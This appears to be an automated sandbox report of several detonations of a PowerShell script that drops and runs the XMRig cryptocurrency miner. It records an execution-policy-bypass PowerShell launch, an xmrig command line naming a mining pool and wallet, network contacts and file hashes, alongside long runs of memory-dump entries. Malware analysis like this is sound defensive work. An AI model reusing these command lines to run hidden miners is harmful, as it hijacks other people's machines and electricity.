memory/4196-112-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-113-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-114-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-115-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-116-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-117-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-118-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-119-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-120-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-121-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-122-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-123-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-124-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-125-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-126-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-127-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-128-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-129-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-130-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-131-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-132-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-133-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-134-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-135-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-136-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-137-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-138-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-139-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-140-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-141-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-142-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-143-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-144-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-145-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-146-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-147-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-148-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-149-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-150-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-151-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-152-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-153-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-154-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-155-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:34
Platform
win11-20240426-en
Max time kernel
1791s
Max time network
1776s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A (64 hits; the report records no description, indicator, process or target for them) | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2868 wrote to memory of 4820 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2868 wrote to memory of 4820 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 52.111.227.11:443 | N/A | tcp |
Files
memory/2868-0-0x00007FFDFF433000-0x00007FFDFF435000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_acdbwelm.ljv.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2868-9-0x00000173ACBB0000-0x00000173ACBD2000-memory.dmp
memory/2868-10-0x00007FFDFF430000-0x00007FFDFFEF2000-memory.dmp
memory/2868-11-0x00007FFDFF430000-0x00007FFDFFEF2000-memory.dmp
memory/2868-12-0x00007FFDFF430000-0x00007FFDFFEF2000-memory.dmp
memory/2868-14-0x00000173C51A0000-0x00000173C51B2000-memory.dmp
memory/2868-15-0x00000173C5190000-0x00000173C519A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4820-46-0x000001F2FF830000-0x000001F2FF850000-memory.dmp
memory/4820-47-0x000001F2FF880000-0x000001F2FF8A0000-memory.dmp
memory/4820-48-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/2868-49-0x00007FFDFF433000-0x00007FFDFF435000-memory.dmp
memory/2868-50-0x00007FFDFF430000-0x00007FFDFFEF2000-memory.dmp
memory/4820-51-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-54-0x000001F2FFD70000-0x000001F2FFD90000-memory.dmp
memory/4820-53-0x000001F2FFD50000-0x000001F2FFD70000-memory.dmp
memory/2868-52-0x00007FFDFF430000-0x00007FFDFFEF2000-memory.dmp
memory/4820-55-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-56-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-57-0x000001F2FFD50000-0x000001F2FFD70000-memory.dmp
memory/4820-58-0x000001F2FFD70000-0x000001F2FFD90000-memory.dmp
memory/4820-59-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-60-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-61-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-62-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-63-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-64-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-65-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-66-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-67-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-68-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-69-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-70-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-71-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-72-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-73-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-74-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-75-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-76-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-77-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-78-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-79-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-80-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-81-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-82-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-83-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-84-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-85-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-86-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-87-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-88-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-89-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-90-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-91-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-92-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-93-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-94-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-95-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-96-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-97-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-98-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-99-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-100-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-101-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-102-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-103-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-104-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-105-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-106-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-107-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-108-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-109-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-110-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-111-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-112-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-113-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-114-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-115-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-116-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-117-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
Analysis: behavioral25
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:47
Platform
win7-20240221-en
Max time kernel
1563s
Max time network
1564s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
Network
Files
memory/2164-4-0x000007FEF622E000-0x000007FEF622F000-memory.dmp
memory/2164-5-0x000000001B690000-0x000000001B972000-memory.dmp
memory/2164-6-0x00000000028E0000-0x00000000028E8000-memory.dmp
memory/2164-7-0x000007FEF5F70000-0x000007FEF690D000-memory.dmp
memory/2164-9-0x000007FEF5F70000-0x000007FEF690D000-memory.dmp
memory/2164-8-0x000007FEF5F70000-0x000007FEF690D000-memory.dmp
memory/2164-11-0x000007FEF5F70000-0x000007FEF690D000-memory.dmp
memory/2164-10-0x000007FEF5F70000-0x000007FEF690D000-memory.dmp
memory/2164-12-0x000007FEF5F70000-0x000007FEF690D000-memory.dmp
Analysis: behavioral28
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:52
Platform
win11-20240508-en
Max time kernel
1798s
Max time network
1787s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A (64 hits; the report records no description, indicator, process or target for them) | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4936 wrote to memory of 4624 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4936 wrote to memory of 4624 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/4936-0-0x00007FFC626A3000-0x00007FFC626A5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hoivu5nd.2jr.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4936-10-0x00007FFC626A0000-0x00007FFC63162000-memory.dmp
memory/4936-9-0x000002C170CB0000-0x000002C170CD2000-memory.dmp
memory/4936-11-0x00007FFC626A0000-0x00007FFC63162000-memory.dmp
memory/4936-12-0x00007FFC626A0000-0x00007FFC63162000-memory.dmp
memory/4936-14-0x000002C1711A0000-0x000002C1711B2000-memory.dmp
memory/4936-15-0x000002C171190000-0x000002C17119A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4624-46-0x000001E053E10000-0x000001E053E30000-memory.dmp
memory/4624-47-0x000001E053E60000-0x000001E053E80000-memory.dmp
memory/4624-48-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-52-0x000001E055630000-0x000001E055650000-memory.dmp
memory/4624-53-0x000001E055650000-0x000001E055670000-memory.dmp
memory/4624-49-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4936-51-0x00007FFC626A0000-0x00007FFC63162000-memory.dmp
memory/4936-50-0x00007FFC626A3000-0x00007FFC626A5000-memory.dmp
memory/4624-54-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-55-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-56-0x000001E055630000-0x000001E055650000-memory.dmp
memory/4624-57-0x000001E055650000-0x000001E055670000-memory.dmp
memory/4624-58-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-59-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-60-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-61-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-62-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-63-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-64-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-65-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-66-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-67-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-68-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-69-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-70-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-71-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-72-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-73-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-74-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-75-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-76-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-77-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-78-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-79-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-80-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-81-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-82-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-83-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-84-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-85-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-86-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-87-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-88-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-89-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-90-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-91-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-92-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-93-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-94-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-95-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-96-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-97-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-98-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-99-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-100-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-101-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-102-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-103-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-104-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-105-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-106-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-107-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-108-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-109-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-110-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-111-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-112-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-113-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-114-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-115-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-116-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:24
Platform
win10v2004-20240508-en
Max time kernel
1797s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A (64 hits; the report records no description, indicator, process or target for them) | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1328 wrote to memory of 2076 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1328 wrote to memory of 2076 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4036,i,10373433614523925616,13586256558317053467,262144 --variations-seed-version --mojo-platform-channel-handle=4204 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=2132,i,10373433614523925616,13586256558317053467,262144 --variations-seed-version --mojo-platform-channel-handle=4264 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
